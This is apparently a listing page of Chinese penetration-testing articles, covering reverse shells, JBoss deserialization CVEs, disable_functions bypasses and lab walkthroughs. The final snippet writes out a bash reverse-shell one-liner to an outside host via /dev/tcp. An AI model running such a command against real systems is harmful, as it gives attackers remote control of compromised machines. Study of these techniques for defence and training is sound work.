绕php的disable_functions此处建议用AntSword的官方绕过插件全自动绕绕过失败的可以手动试一下:https://github.com/AntSwordProject/AntSwo...
记一次对Hack the box_remote的渗透测试
简介 这是一个简单的Windows Server 2019靶机,要成功获得SYSTEM权限需要不懈的尝试。通过浏览Web站点发现Umbraco CMS登录入口,然后在2049端口发现NFS服务并发现共...
基于主机的反弹shell检测思路
零基础黑客教程,黑客圈新闻,安全面试经验尽在 # 暗网黑客教程 #一前言难免有时候网站会存在命令执行、代码执行等漏洞可能被黑客反弹shell,如何第一时间发现反弹shell特征,kill掉相应进程,保...
nc监听反弹shell之加密流量
网安引领时代,弥天点亮未来 0x00写在前面本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!0x01背景描述在攻防对抗过程中的横行渗...
底层原理 | Linux计划任务反弹shell探究
点击上方“蓝字”,关注更多精彩计划任务功能在windows系统、Linux系统中历史很悠久了,方便运维管理。而在渗透测试中,利用到计划任务的常见的有挖矿病毒、redis未授权、docker特权模式逃逸...
『渗透测试』使用 OpenSSL 反弹加密 Shell
点击蓝字 关注我们日期:2022-05-19作者:hdsec介绍:对反弹shell传输的数据进行加密。0x00 前言借用百度词条的解释,在计算机网络上,OpenSSL是一个开放源代码的软件库包,应用程...
VulnHub-My_Tomcat_Host
靶机搭建靶机地址:https://www.vulnhub.com/entry/my-tomcat-host-1,457/靶机目标:目标1:提权查看root目录下的proof.txt文件。使用工具:nc...
权限维持-Netcat程序监控
最近在学习中发现 netcat 连接被动后门比如( crontab 写定时反弹shell / alias...
漏洞复现-CVE-2017-7504 JBoss反序列化远程代码执行
0x01 漏洞描述 JBoss是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理...
漏洞复现-CVE-2017-12149 JBoss反序列化远程代码执行
0x01 漏洞描述 JBoss是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理...
记一次内部红蓝对抗
前言年前部门内有个模拟对抗的比赛,记录下当时的过程,感谢导师带我玩。渗透过程本身是一个试错的过程,所以只记录下过程中的有效步骤。给定目标为域名,通过openvpn访问,于是先对*.xxx.com进行子...
常用反弹shell方法总结
0x01 bash反弹shellbash -i >&/dev/tcp/1.1.1.1/9999 0>&1解释:bash -i [interface] 表示启动sh...
19